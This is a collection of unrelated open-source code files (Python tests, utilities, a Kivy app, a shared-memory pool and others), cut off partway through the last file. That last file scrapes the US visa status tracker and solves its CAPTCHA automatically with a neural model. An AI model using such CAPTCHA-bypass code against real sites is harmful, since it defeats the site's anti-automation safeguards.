\n\ndef get_202_science_chinese():\n offsetX_202_science_chinese = latLangX * 0.115\n offsetY_202_science_chinese = latLangY * 0.75\n\n # 202 理科借阅\n # 24个书架\n\n # 每两个字符串左右代表一个书架的西东两面\n # todo 修正,东西面放入property\n row1ShelfNumbering = [\"x703.1\", \" x21\", \" u\", \" tu983\", \" tu201.4\", \" ts972.122\", \" ts664.01-39\", \" tq150.1\", \" tn941.3\", \" tn919\", \" tn911.22\", \" tn643\", \" tn01\", \" tm13\", \" th-62\", \" tb472-39\", \" tb11\", \" s682.2\", \" s216.4\", \" r746.940.5\", \" r541.5\", \" r323.1\",\n \" r212\", \" r151.3-62\", \" q959.1\", \" q945.4\", \" q78\", \" q2-49\", \" q-49\", \" p7-092\", \" p338\", \" p159-49\", \" o64-61\", \" o6-3\", \" o413.1\", \" o351.2\", \" o226\", \" o21\", \" o174.1\", \" o157\", \" o141.4\", \" o13\", \" o13\", \" o1-53\", \" o1\", \" n49\", \" n091-49\", \" n\", ]\n zipped = zipNumbering(row1ShelfNumbering)\n\n for index in range(len(zipped)):\n features['features'].append(\n getFeature(\n zipped[index][0],\n zipped[index][1],\n Towards.NorthSouth,\n getShelfOffsetX(offsetX_202_science_chinese, index),\n offsetY_202_science_chinese\n )\n )\n # todo\n row2 = []\n\n\nget_202_science_chinese()\n\nwith open('./data.js', 'w') as f:\n f.write(\"var features = {}\".format(json.dumps(features)))\n","repo_name":"lraty-li/scnu-library-map","sub_path":"genGeoJson.py","file_name":"genGeoJson.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71533126322","text":"from pydantic import BaseModel\nfrom typing import Any, Dict, AnyStr, List, Union, Optional\n\nJSONObject = Dict[AnyStr, Any]\nJSONArray = List[Any]\nJSONStructure = Union[JSONArray, JSONObject]\n\n\nclass 
VectorizedText(BaseModel):\n sentence_vector: List[float]\n status: bool\n","repo_name":"nitin1993915/sentence_vectorizer","sub_path":"schema/response_model.py","file_name":"response_model.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22775400664","text":"import numpy as np\nfrom tests import binvox_rw_original\nfrom binvox import Binvox\nimport filecmp\n\n\ndef test_loading():\n # Load using original python script from Daniel Maturana\n with open('tests/chair.binvox', 'rb') as f:\n loaded_old = binvox_rw_original.read_as_3d_array(f)\n\n # Load with our library\n loaded_new = Binvox.read('tests/chair.binvox', mode='dense')\n\n # Check for the correctness of the data\n assert np.allclose(loaded_old.data, loaded_new.numpy())\n\n\ndef test_saving():\n # Load from binvox file\n binvox = Binvox.read('tests/chair.binvox', mode='dense')\n # Save to binvox file\n binvox.write('tests/chair_new.binvox')\n\n # Check for the equality of files\n assert filecmp.cmp('tests/chair.binvox', 'tests/chair_new.binvox')\n\n # Load from the newly saved file\n binvox_duplicate = Binvox.read('tests/chair_new.binvox', mode='dense')\n\n # Check correctness of data\n assert np.allclose(binvox.numpy(), binvox_duplicate.numpy())\n","repo_name":"faridyagubbayli/binvox","sub_path":"tests/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"11695255765","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nfrom argparse import ArgumentParser\n\n\ndef find_templates(target):\n for root, dirs, files in os.walk(target):\n for fname in files:\n if fname[-3:] == '.j2' and fname[-7:] != '.min.j2':\n src_path = os.path.join(root, fname)\n dst_path = os.path.join(root, \"%s.min.j2\" % fname[:-3])\n yield (src_path, dst_path)\n\n\ndef minify_tpl(src_path, dst_path, inplace=False):\n # read input\n with open(src_path, 'r') as fsrc:\n src_data = fsrc.readlines()\n\n # write output\n with open(src_path if inplace else dst_path, 'w+') as fdst:\n for line in src_data:\n fdst.write(line.strip())\n\n\ndef main():\n try:\n pr = ArgumentParser(prog=None)\n pr.add_argument(\n '--quiet', dest='quiet', action='store_true',\n help=\"quiet operaton mode\")\n pr.add_argument(\n '--inplace', dest='inplace', action='store_true',\n help=\"minify templates inplace (replace original file)\")\n pr.add_argument(\n 'target',\n help=\"target parent folder to search for templates\")\n args = pr.parse_args()\n\n if not (len(args.target) and os.path.exists(args.target)):\n raise ValueError(\"invalid target path %s\" % args.target)\n\n if not args.quiet:\n print(\"minify templates under: %s\" % args.target)\n\n for fsrc, fdst in find_templates(args.target):\n if not args.quiet:\n print(\"template: %s\" % fsrc)\n minify_tpl(fsrc, fdst, inplace=args.inplace)\n\n except Exception as e:\n print(\"ERROR: %s\" % e)\n sys.exit(1)\n\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"exonlabs/exonwebui","sub_path":"scripts/minify_templates.py","file_name":"minify_templates.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"29314317290","text":"from pathlib import Path\nfrom unittest import TestCase, mock\n\nfrom pytest_unordered import unordered\n\nfrom strelka.scanners.scan_email import ScanEmail 
as ScanUnderTest\nfrom strelka.tests import run_test_scan\n\n\ndef test_scan_email(mocker):\n \"\"\"\n Pass: Sample event matches output of scanner.\n Failure: Unable to load file or sample event fails to match.\n \"\"\"\n\n test_scan_event = {\n \"elapsed\": mock.ANY,\n \"flags\": [],\n \"total\": {\"attachments\": 2, \"extracted\": 2},\n \"body\": \"Lorem Ipsum\\n\\n[cid:image001.jpg@01D914BA.2B9507C0]\\n\\n\\nLorem ipsum dolor sit amet, consectetur adipisci...tristique mi, quis finibus justo augue non ligula. Quisque facilisis dui in orci aliquet fermentum.\\n\",\n \"domains\": unordered(\n [\n \"schemas.microsoft.com\",\n \"www.w3.org\",\n \"div.msonormal\",\n \"span.msohyperlink\",\n \"span.msohyperlinkfollowed\",\n \"span.emailstyle17\",\n \"1.0in\",\n \"div.wordsection1\",\n ]\n ),\n \"attachments\": {\n \"filenames\": [\"image001.jpg\", \"test.doc\"],\n \"hashes\": unordered(\n [\n \"ee97b5bb7816b8ad3c3b4024a5d7ff06\",\n \"33a13c0806ec35806889a93a5f259c7a\",\n ]\n ),\n \"totalsize\": 72819,\n },\n \"subject\": \"Lorem Ipsum\",\n \"to\": unordered([\"baz.quk@example.com\"]),\n \"from\": \"foo.bar@example.com\",\n \"date_utc\": \"2022-12-21T02:29:49.000Z\",\n \"message_id\": \"S7PR03MB5640AD212589DFB7CE58D90CFBEB9@DS7PR03MB5640.namprd03.prod.outlook.co\",\n \"received_domain\": unordered(\n [\n \"ch2pr03mb5366.namprd03.prod.outlook.com\",\n \"mx0b-0020ab02.pphosted.com\",\n \"pps.filterd\",\n \"mx.example.com\",\n \"ds7pr03mb5640.namprd03.prod.outlook.com\",\n \"mx0a-0020ab02.pphosted.com\",\n ]\n ),\n \"received_ip\": unordered(\n [\n \"022.12.20.18\",\n \"fe80::bd8e:df17:2c2f:2490\",\n \"8.17.1.19\",\n \"2603:10b6:5:2c0::11\",\n \"205.220.177.243\",\n \"2603:10b6:610:96::16\",\n \"127.0.0.1\",\n \"2002:a05:6500:11d0:b0:17b:2a20:6c32\",\n ]\n ),\n }\n\n scanner_event = run_test_scan(\n mocker=mocker,\n scan_class=ScanUnderTest,\n fixture_path=Path(__file__).parent / \"fixtures/test.eml\",\n )\n\n TestCase.maxDiff = None\n TestCase().assertDictEqual(test_scan_event, scanner_event)\n","repo_name":"target/strelka","sub_path":"src/python/strelka/tests/test_scan_email.py","file_name":"test_scan_email.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":755,"dataset":"github-code","pt":"75"} +{"seq_id":"24744109589","text":"from inspect import stack, getmodule\nfrom typing import List\n\ndef get_process_names() -> List:\n \"\"\"Get process names\n\n Returns:\n List: process names\n \"\"\"\n module_names = [\"none\"]\n for stack_entry in stack():\n current_module = getmodule(stack_entry[0])\n if current_module is not None:\n module_names += [current_module.__name__]\n\n return module_names","repo_name":"MahdiAll99/MEDimage","sub_path":"MEDimage/utils/find_process_names.py","file_name":"find_process_names.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"26962213496","text":"\"\"\"Provides shared memory for direct access across processes.\r\nThe API of this package is currently provisional. 
Refer to the\r\ndocumentation for details.\r\n\"\"\"\r\n\r\n\r\n__all__ = [ 'SharedNumpyPool' ]\r\n\r\n\r\nfrom functools import partial\r\nimport mmap\r\nimport os\r\nimport errno\r\nimport struct\r\nimport secrets\r\nimport types\r\nimport numpy as np\r\n\r\n\r\n_O_CREX = os.O_CREAT | os.O_EXCL\r\n\r\n# FreeBSD (and perhaps other BSDs) limit names to 14 characters.\r\n_SHM_SAFE_NAME_LENGTH = 14\r\n\r\n\r\ndef _make_filename(directory):\r\n \"Create a random filename for the shared memory object.\"\r\n # number of random bytes to use for name\r\n nbytes = _SHM_SAFE_NAME_LENGTH // 2\r\n assert nbytes >= 2\r\n name = secrets.token_hex(nbytes)\r\n assert len(name) <= _SHM_SAFE_NAME_LENGTH\r\n return os.path.join(directory, name)\r\n\r\n\r\nclass SharedMemory:\r\n \"\"\"Creates a new shared memory block or attaches to an existing\r\n shared memory block.\r\n Every shared memory block is assigned a unique name. This enables\r\n one process to create a shared memory block with a particular name\r\n so that a different process can attach to that same shared memory\r\n block using that same name.\r\n As a resource for sharing data across processes, shared memory blocks\r\n may outlive the original process that created them. When one process\r\n no longer needs access to a shared memory block that might still be\r\n needed by other processes, the close() method should be called.\r\n When a shared memory block is no longer needed by any process, the\r\n unlink() method should be called to ensure proper cleanup.\"\"\"\r\n\r\n # Defaults; enables close() and unlink() to run without errors.\r\n _name = None\r\n _fd = -1\r\n _mmap = None\r\n _buf = None\r\n _flags = os.O_RDWR\r\n _mode = 0o600\r\n\r\n def __init__(self, directory, name=None, create=False, size=0):\r\n if not size >= 0:\r\n raise ValueError(\"'size' must be a positive integer\")\r\n if create:\r\n self._flags = _O_CREX | os.O_RDWR\r\n if size == 0:\r\n raise ValueError(\"'size' must be a positive number different from zero\")\r\n if name is None and not self._flags & os.O_EXCL:\r\n raise ValueError(\"'name' can only be None if create=True\")\r\n\r\n\r\n # Shared Memory\r\n try:\r\n os.makedirs(directory)\r\n except FileExistsError:\r\n pass\r\n\r\n if name is None:\r\n while True:\r\n name = _make_filename(directory)\r\n try:\r\n self._fd = os.open(name, self._flags, mode=self._mode)\r\n except FileExistsError:\r\n continue\r\n self._name = name\r\n break\r\n else:\r\n self._fd = os.open(name, self._flags, mode=self._mode)\r\n self._name = name\r\n try:\r\n if create and size:\r\n os.ftruncate(self._fd, size)\r\n stats = os.fstat(self._fd)\r\n size = stats.st_size\r\n self._mmap = mmap.mmap(self._fd, size)\r\n except OSError:\r\n self.unlink()\r\n raise\r\n\r\n self._size = size\r\n self._buf = memoryview(self._mmap)\r\n\r\n def __del__(self):\r\n try:\r\n self.close()\r\n except OSError:\r\n pass\r\n\r\n def __reduce__(self):\r\n return (\r\n self.__class__,\r\n (\r\n self.name,\r\n False,\r\n self.size,\r\n ),\r\n )\r\n\r\n def __repr__(self):\r\n return f'{self.__class__.__name__}({self.name!r}, size={self.size})'\r\n\r\n @property\r\n def buf(self):\r\n \"A memoryview of contents of the shared memory block.\"\r\n return self._buf\r\n\r\n @property\r\n def name(self):\r\n \"Unique name that identifies the shared memory block.\"\r\n return self._name\r\n\r\n @property\r\n def size(self):\r\n \"Size in bytes.\"\r\n return self._size\r\n\r\n def close(self):\r\n \"\"\"Closes access to the shared memory from this instance but does\r\n 
not destroy the shared memory block.\"\"\"\r\n if self._buf is not None:\r\n self._buf.release()\r\n self._buf = None\r\n if self._mmap is not None:\r\n self._mmap.close()\r\n self._mmap = None\r\n if self._fd >= 0:\r\n os.close(self._fd)\r\n self._fd = -1\r\n\r\n def unlink(self):\r\n \"\"\"Requests that the underlying shared memory block be destroyed.\r\n In order to ensure proper cleanup of resources, unlink should be\r\n called once (and only once) across all processes which have access\r\n to the shared memory block.\"\"\"\r\n if self._name:\r\n try:\r\n os.remove(self._name)\r\n except:\r\n pass\r\n\r\n\r\n\r\nclass SharedNumpyPool:\r\n def __init__(self, directory, max_size=0, name=None, table={}, used=0):\r\n self.shm = None if name is None else SharedMemory(name=name, directory=directory)\r\n self.table = table\r\n self.used = used\r\n self.max_size = max_size\r\n self.lazy = False\r\n self.directory = directory\r\n\r\n def allocate_lazy(self):\r\n assert self.shm is None\r\n self.lazy = True\r\n yield None\r\n self.lazy = False\r\n assert self.shm is None\r\n self.max_size = (self.used//4096+1) * 4096\r\n self.used = 0\r\n self.shm = SharedMemory(create=True, size=self.max_size, directory=self.directory)\r\n yield None\r\n\r\n def allocate(self, key, shape, dtype=np.float32):\r\n assert self.table.get(key) is None\r\n size = np.dtype(dtype).itemsize\r\n for i in shape:\r\n size *= i\r\n self.used += size\r\n if not self.lazy:\r\n assert self.max_size >= size\r\n assert self.shm is not None\r\n self.table[key] = (shape, dtype, self.used - size, self.used, size // shape[0])\r\n return np.ndarray(shape, dtype=dtype, buffer=self.shm.buf[self.used - size:self.used])\r\n\r\n def allocate_copies(self, key, arr):\r\n return self.allocate(key, arr.shape, arr.dtype.str)\r\n\r\n def get(self, key, rg=None, reduce=False):\r\n shape, dtype, begin, end, csize = self.table[key]\r\n if rg is None:\r\n return np.ndarray(shape, dtype=dtype, buffer=self.shm.buf[begin:end])\r\n if reduce and rg[1] - rg[0] == 1:\r\n return np.ndarray(shape[1:], dtype=dtype, buffer=self.shm.buf[begin+rg[0]*csize:begin+rg[1]*csize])\r\n return np.ndarray((rg[1]-rg[0], *shape[1:]), dtype=dtype, buffer=self.shm.buf[begin+rg[0]*csize:begin+rg[1]*csize])\r\n\r\n def dump(self):\r\n return {\r\n 'max_size': self.max_size,\r\n 'name': self.shm.name,\r\n 'table': self.table,\r\n 'used': self.used,\r\n 'directory': self.directory\r\n }\r\n\r\n def __del__(self):\r\n if self.shm is not None:\r\n self.shm.close()\r\n self.shm.unlink()\r\n\r\n \r\n","repo_name":"siyandong/NeuralCoMapping","sub_path":"env/gibson_api/utils/shared_memory.py","file_name":"shared_memory.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"75"} +{"seq_id":"7840103860","text":"from django.shortcuts import render\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nimport copy\n\n_MY_FOODS = ['apple', 'banana', 'orrange', 'grape', 'spam']\n_ITEM_IN_EACH_PAGE = 2\n\ndef index(request):\n foods = copy.deepcopy(_MY_FOODS)\n\n request_page = request.GET.get('page')\n paginator = Paginator(foods, _ITEM_IN_EACH_PAGE)\n\n try:\n pages = paginator.get_page(request_page)\n except PageNotAnInteger:\n pages = paginator.get_page(1)\n except EmptyPage:\n pages = paginator.get_page(paginator.num_pages)\n\n return render(request, 'manypages/index.html', { 'pages': pages 
})","repo_name":"ymatsukawa/scrape_tool","sub_path":"test/manypages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30300091929","text":"import ROOT,os\nfrom Core.Utils.printFunc import pyPrint\nfrom Utils.System import system\n\nROOT.gROOT.SetBatch(ROOT.kTRUE)\n\ndef clearHist(h):\n for i in range(1,h.GetNbinsX()+1):\n if h.GetBinContent(i) < 0.: h.SetBinContent(i,0.)\n\ndef getIntegralAndError(hist):\n clearHist(hist)\n err = ROOT.Double(0.)\n integral = hist.IntegralAndError(1,hist.GetNbinsX()+1,err)\n return integral,err\n\n# ________________________________________________________________________________ ||\n#out_path = \"ZPlusX/Systematic/2019-05-03_Run2016/\"\n#out_path = \"ZPlusX/Systematic/2019-05-03_Run2017/\"\nout_path = \"ZPlusX/Systematic/2019-05-03_Run2018/\"\n\nUser = os.environ['USER']\ninputPath = system.getStoragePath()+\"/\"+User+\"/Higgs/DarkZ/\"+out_path+\"/ZPlusX/DataMCDistribution.root\"\nhistNames = [\n \"Z2_4e_mass\",\n \"Z2_2mu2e_mass\",\n \"Z2_4mu_mass\",\n \"Z2_2e2mu_mass\",\n ]\n\npyPrint(\"Input path: \"+inputPath)\n\n# ________________________________________________________________________________ ||\nf = ROOT.TFile.Open(inputPath)\nfor histName in histNames:\n pyPrint(\"-\"*20)\n pyPrint(histName)\n h_nominal = f.Get(histName)\n integral_nominal,error_nominal = getIntegralAndError(h_nominal)\n pyPrint(\"Nominal: \"+str(integral_nominal)+\" +/- \"+str(error_nominal))\n \n h_UniIso = f.Get(histName+\"_UniIso\")\n integral_UniIso,error_UniIso = getIntegralAndError(h_UniIso)\n pyPrint(\"Nominal: \"+str(integral_UniIso)+\" +/- \"+str(error_UniIso))\n \n h_AsymIso = f.Get(histName+\"_AsymIso\")\n integral_AsymIso,error_AsymIso = getIntegralAndError(h_AsymIso)\n pyPrint(\"Nominal: \"+str(integral_AsymIso)+\" +/- \"+str(error_AsymIso))\n \n syst = max([\n abs(integral_nominal-integral_UniIso)/integral_nominal,\n abs(integral_nominal-integral_AsymIso)/integral_nominal,\n ]\n )\n pyPrint(\"Systematic: %4.2f %%\"%(syst*100.))\n","repo_name":"lucien1011/PyNTupleProcessor","sub_path":"DarkZ/Script/make_ZPlusX_syst_cfg.py","file_name":"make_ZPlusX_syst_cfg.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11552096581","text":"#!/usr/bin/env python\n#-*- coding:utf8 -*-\n\"\"\"\n__iter__() 方法返回对象本身,是for遇见使用迭代器的要求\n__next__() 方法返回容器中下一个元素或数据,当容器中数据用尽时,引发StopIteration异常\n\"\"\"\n#自定义迭代器\nclass MyIterator:\n def __init__(self,x=2,xmax=100):\n '''\n 定义构造方法,初始化属性\n '''\n self.__mul,self.__x = x,x\n self.__xmax = xmax\n\n def __iter__(self):\n \"\"\"\n :return:定义迭代器协议方法,返回类本身\n \"\"\"\n return self\n\n def __next__(self):\n if self.__x and self.__x != 1:\n self.__mul *= self.__x\n if self.__mul <= self.__xmax:\n return self.__mul\n else:\n raise StopIteration\n else:\n raise StopIteration\n\nif __name__ == '__main__':\n myiter = MyIterator()\n for i in myiter:\n print(\"迭代器的数据元素为{}\".format(i))","repo_name":"hujianli94/Python-code","sub_path":"7.迭代器、生成器、装饰器/迭代器/迭代器.py","file_name":"迭代器.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"16802721033","text":"from kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.uix.button import 
Button\r\n\r\n\r\nclass ReminderApp(App):\r\n def build(self):\r\n layout = BoxLayout(orientation='vertical')\r\n\r\n self.input = TextInput(multiline=False, input_filter='int', hint_text='Enter 5 digits')\r\n self.input.bind(on_text_validate=self.set_reminder)\r\n layout.add_widget(self.input)\r\n\r\n button_layout = BoxLayout(orientation='horizontal')\r\n\r\n enter_button = Button(text='Enter Reminder')\r\n enter_button.bind(on_press=self.set_reminder)\r\n button_layout.add_widget(enter_button)\r\n\r\n change_button = Button(text='Change Reminder')\r\n change_button.bind(on_press=self.change_reminder)\r\n button_layout.add_widget(change_button)\r\n\r\n layout.add_widget(button_layout)\r\n\r\n self.reminder_label = Label(text='')\r\n layout.add_widget(self.reminder_label)\r\n\r\n self.reminder_set = False\r\n\r\n # Add a TextInput for entering current readings\r\n self.readings_input = TextInput(multiline=False, input_filter='int', hint_text='Enter current readings')\r\n layout.add_widget(self.readings_input)\r\n\r\n # Add a button to enter current readings and check reminder\r\n enter_reading_button = Button(text='Enter Current Readings')\r\n enter_reading_button.bind(on_press=self.enter_current_readings)\r\n layout.add_widget(enter_reading_button)\r\n\r\n return layout\r\n\r\n def set_reminder(self, instance):\r\n input_text = self.input.text\r\n\r\n if len(input_text) != 5:\r\n self.reminder_label.text = 'Please enter 5 digits.'\r\n return\r\n\r\n self.reminder_set = True\r\n self.reminder = int(input_text)\r\n self.reminder_label.text = f'Reminder is set for {self.reminder}'\r\n\r\n def change_reminder(self, instance):\r\n self.reminder_set = False\r\n self.reminder_label.text = 'Reminder cleared. Please enter a new 5-digit reminder.'\r\n\r\n def enter_current_readings(self, instance):\r\n current_readings = self.readings_input.text\r\n self.readings_input.text = current_readings\r\n self.check_reminder(None)\r\n\r\n def check_reminder(self, instance):\r\n if not self.reminder_set:\r\n self.reminder_label.text = 'Please set a reminder first.'\r\n return\r\n\r\n input_text = self.readings_input.text\r\n\r\n if not input_text:\r\n self.reminder_label.text = 'Please enter a number to check.'\r\n return\r\n\r\n input_value = int(input_text)\r\n diff = abs(input_value - self.reminder)\r\n\r\n if input_value == self.reminder:\r\n self.reminder_label.text = 'Reminder: Do not forget to get oil changed!'\r\n elif input_value < self.reminder:\r\n self.reminder_label.text = f'You still have {diff} kms left before oil change.'\r\n else:\r\n self.reminder_label.text = 'Please get oil changed!'\r\n\r\n\r\nif __name__ == '__main__':\r\n ReminderApp().run()\r\n","repo_name":"Raffey26/Oil-chng-rem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20141514080","text":"from datetime import datetime\n\nfrom common.logger import get_logger\nfrom verification.domain.factory.verification_factory import VerificationFactory\nfrom verification.infrastructure.models import VerificationModel\nfrom verification.infrastructure.repositories.base_repository import BaseRepository\n\nlogger = get_logger(__name__)\n\n\nclass VerificationRepository(BaseRepository):\n\n def get_all_verification(self, entity_id, verification_type):\n try:\n verification_db_list = self.session.query(VerificationModel) \\\n .filter(VerificationModel.entity_id == entity_id) \\\n 
.filter(VerificationModel.verification_type == verification_type).all()\n verifications = VerificationFactory.verification_entity_from_db_list(verification_db_list)\n self.session.commit()\n except:\n self.session.rollback()\n raise\n return verifications\n\n def __get_verification_db(self, verification_id=None, entity_id=None):\n verification_db_query = self.session.query(VerificationModel)\n if entity_id is not None:\n verification_db_query = verification_db_query.filter(VerificationModel.entity_id == entity_id)\\\n .order_by(VerificationModel.created_at.desc())\n elif verification_id is not None:\n verification_db_query = verification_db_query.filter(VerificationModel.id == verification_id)\n else:\n return None\n verification_db = verification_db_query.first()\n return verification_db\n\n def add_verification(self, verification):\n self.add_item(VerificationModel(\n id=verification.id, verification_type=verification.type, entity_id=verification.entity_id,\n status=verification.status, requestee=verification.requestee, created_at=verification.created_at,\n updated_at=verification.updated_at))\n\n def get_verification(self, verification_id=None, entity_id=None):\n try:\n verification_db = self.__get_verification_db(verification_id, entity_id)\n verification = None\n if verification_db is not None:\n verification = VerificationFactory.verification_entity_from_db(verification_db)\n self.session.commit()\n except:\n self.session.rollback()\n raise\n return verification\n\n def update_verification(self, verification):\n try:\n verification_db = self.__get_verification_db(verification_id=verification.id)\n if verification_db is None:\n logger.error(f\"Verification not found with id {verification.verification_id}\")\n raise Exception(f\"No verification found for {verification.id}\")\n verification_db.status = verification.status\n verification_db.reject_reason = verification.reject_reason\n verification_db.updated_at = datetime.utcnow()\n self.session.commit()\n except:\n self.session.rollback()\n raise\n\n def get_verification_list(self, verification_type, status):\n try:\n verification_query = self.session.query(VerificationModel)\n if verification_type is not None:\n verification_query = verification_query.filter(VerificationModel.verification_type == verification_type)\n if status is not None:\n verification_query = verification_query.filter(VerificationModel.status == status)\n verification_db = verification_query.all()\n verification = VerificationFactory.verification_entity_from_db_list(verification_db)\n self.session.commit()\n except:\n self.session.rollback()\n raise\n return verification\n","repo_name":"singnet/snet-marketplace-service","sub_path":"verification/infrastructure/repositories/verification_repository.py","file_name":"verification_repository.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"25656557531","text":"import time\nimport unittest\n\nfrom fabric_cf.actor.core.common.constants import Constants\nfrom fabric_cf.actor.core.core.unit import Unit, UnitState\nfrom fabric_cf.actor.core.kernel.reservation_client import ClientReservationFactory\nfrom fabric_cf.actor.core.kernel.slice import SliceFactory\nfrom fabric_cf.actor.core.plugins.substrate.db.substrate_actor_database import SubstrateActorDatabase\nfrom fabric_cf.actor.core.util.id import ID\nfrom fabric_cf.actor.core.util.resource_type import ResourceType\nfrom fabric_cf.actor.test.base_test_case import 
BaseTestCase\n\n\nclass UnitTest(BaseTestCase, unittest.TestCase):\n from fabric_cf.actor.core.container.globals import Globals\n Globals.config_file = \"./config/config.test.yaml\"\n Constants.SUPERBLOCK_LOCATION = './state_recovery.lock'\n\n from fabric_cf.actor.core.container.globals import GlobalsSingleton\n GlobalsSingleton.get().start(force_fresh=True)\n while not GlobalsSingleton.get().start_completed:\n time.sleep(0.0001)\n\n def make_actor_database(self) -> SubstrateActorDatabase:\n from fabric_cf.actor.core.container.globals import GlobalsSingleton\n return GlobalsSingleton.get().get_container().get_actor().get_plugin().get_database()\n\n def test_unit(self):\n rid = ID()\n u1 = Unit(rid=rid)\n self.assertIsNotNone(u1.get_id())\n self.assertEqual(UnitState.DEFAULT, u1.get_state())\n self.assertIsNone(u1.get_property(name=\"foo\"))\n self.assertIsNone(u1.get_parent_id())\n self.assertIsNotNone(u1.get_reservation_id())\n self.assertIsNone(u1.get_slice_id())\n self.assertIsNone(u1.get_actor_id())\n\n self.assertEqual(0, u1.get_sequence())\n u1.increment_sequence()\n self.assertEqual(1, u1.get_sequence())\n u1.decrement_sequence()\n self.assertEqual(0, u1.get_sequence())\n\n db = self.make_actor_database()\n\n slice_id = ID()\n from fabric_cf.actor.core.container.globals import GlobalsSingleton\n actor_id = GlobalsSingleton.get().get_container().get_actor().get_guid()\n\n slice_obj = SliceFactory.create(slice_id=slice_id, name=\"test_slice\")\n db.add_slice(slice_object=slice_obj)\n\n reservation = ClientReservationFactory.create(rid=rid, slice_object=slice_obj)\n u1.set_actor_id(actor_id=actor_id)\n u1.set_reservation(reservation=reservation)\n u1.set_slice_id(slice_id=slice_id)\n\n db.add_reservation(reservation=reservation)\n\n u1.start_prime()\n self.assertEqual(UnitState.PRIMING, u1.get_state())\n u1.set_property(name=\"foo\", value=\"bar\")\n u1.increment_sequence()\n u1.increment_sequence()\n resource_type = ResourceType(resource_type=\"1\")\n u1.set_resource_type(rtype=resource_type)\n self.assertEqual(2, u1.get_sequence())\n\n db.add_unit(u=u1)\n\n self.assertIsNotNone(db.get_unit(uid=rid))\n","repo_name":"fabric-testbed/ControlFramework","sub_path":"fabric_cf/actor/test/core/core/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74917697525","text":"from typing import Dict, List\nimport requests\nimport os\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nfrom pprint import pprint\nimport logging\nimport onnxruntime as ort\nimport numpy as np\nfrom PIL import Image\nimport string\nfrom io import BytesIO\nimport logging\nimport json\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives import serialization, hashes\nimport base64\nimport time\nlogger = logging.getLogger()\n\ncharacters = '-' + string.digits + string.ascii_uppercase\nwidth, height, n_len, n_classes = 200, 50, 6, len(characters)\n\nprivate_key_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"private_key.pem\")\nprivate_key = serialization.load_pem_private_key(\n open(private_key_path, 'rb').read(),\n password=None,\n)\n\ndef decode(sequence):\n a = ''.join([characters[x] for x in sequence])\n s = ''.join([x for j, x in enumerate(a[:-1]) if x != characters[0] and x != a[j+1]])\n if len(s) == 0:\n return ''\n if a[-1] != characters[0] and s[-1] != a[-1]:\n s += a[-1]\n return 
s\n\ncaptcha_onnx = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"captcha.onnx\")\nORT_SESS = ort.InferenceSession(captcha_onnx, providers=['CPUExecutionProvider'])\n\ndef pred(img_content):\n img = np.asarray( Image.open(BytesIO(img_content)) ,dtype=np.float32) / 255.0\n img = np.expand_dims(np.transpose(img,(2,0,1)), axis=0)\n outputs = ORT_SESS.run(None, {'input': img})\n x = outputs[0]\n t = np.argmax( np.transpose(x,(1,0,2)), -1)\n pred = decode(t[0])\n return pred\n\nERR_CAPTCHA = \"The code entered does not match the code displayed on the page.\"\nERR_NOCASE = \"Your search did not return any data.\"\nERR_INVCODE = \"Invalid Application ID or Case Number.\"\nERR_DECRYPT = \"Decrypt Error\"\n\nURL = \"https://ceac.state.gov/CEACStatTracker/Status.aspx?App=NIV\"\n\ns = requests.Session()\ns.headers[\"User-Agent\"]=\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\"\n\n\ndef read_hidden_input(soup: BeautifulSoup):\n ret = {}\n input_list = soup.find_all(\"input\", attrs={ \"type\":\"hidden\"})\n for x in input_list:\n ret[x.attrs[\"name\"]] = x.attrs[\"value\"]\n return ret\n\ndef get_post_data(soup=None):\n if soup is None:\n html = s.get(URL).text\n soup = BeautifulSoup(html, features=\"html.parser\")\n data = read_hidden_input(soup)\n CaptchaImageUrl = soup.find(id=\"c_status_ctl00_contentplaceholder1_defaultcaptcha_CaptchaImage\").attrs[\"src\"]\n img_resp = s.get(urljoin(URL,CaptchaImageUrl))\n data[\"ctl00$ContentPlaceHolder1$Captcha\"]=pred(img_resp.content)\n 